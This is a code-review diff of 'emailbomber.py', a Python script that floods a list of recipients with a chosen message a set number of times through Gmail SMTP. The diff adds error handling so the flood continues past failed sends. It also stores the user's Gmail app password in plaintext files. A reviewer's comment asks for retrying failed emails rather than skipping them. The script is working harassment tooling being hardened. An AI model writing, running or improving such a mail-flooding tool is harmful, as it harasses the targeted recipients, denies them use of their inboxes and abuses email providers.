emailbomber.py

```diff
@@ -28,19 +32,28 @@
     input("Enter to exit...")
     quit() #Quits program.
 
-if not path.exists("User_Credentials"): #If user credentials does not exist, creates and saves credential files.
-    #If there are no errors in credentials, save user information after SMTP verification.
-    mkdir("User_Credentials") #Creats User_Credentials folder.
-    open("User_Credentials/sender.txt", "xt").write(sender) #Creates and saves user's Gmail address to User_Credentials folder.
-    open("User_Credentials/app_password.txt", "xt").write(app_password) #Creates and saves user's Gmail app password to User_Credentials folder.
-    input("\nYour credentials have been saved, so you do not have to repeat this process.\nTo change your credentials, go to User_Credentials and change your file information.\nPress enter to continue...")
+try:
+    if not path.exists("User_Credentials"): #If user credentials does not exist, creates and saves credential files.
+        #If there are no errors in credentials, save user information after SMTP verification.
+        mkdir("User_Credentials") #Creats User_Credentials folder.
+        open("User_Credentials/sender.txt", "xt").write(sender) #Creates and saves user's Gmail address to User_Credentials folder.
+        open("User_Credentials/app_password.txt", "xt").write(app_password) #Creates and saves user's Gmail app password to User_Credentials folder.
+        input("\nYour credentials have been saved, so you do not have to repeat this process.\nTo change your credentials, go to User_Credentials and change your file information.\nPress enter to continue...")
+except OSError: #Operating system error.
+    print("\nError:\nThere was an error saving your credentials.")
 
 print("\nEmail-bomber has started...\n")
 
 for i in range(count): #Amount of messages to be sent.
     for email_receiver in receiver.split(","): #Loops through emails to send emails to.
-        server.sendmail(from_addr= sender, to_addrs=email_receiver, msg=message) #Sends email to receiver.
-        print(f"Email-bombing {email_receiver}...")
+        try:   
+            print(f"Email-bombing {email_receiver}...")     
+            server.sendmail(from_addr= sender, to_addrs=email_receiver, msg=message) #Sends email to receiver.
+            print("Email sent successfully!")
+        except smtplib.SMTPException as error:
+            print(f"Error:\n{error}")
+            continue
```

Comment:
This except sounds like we just skip over an email instead of retrying to send it.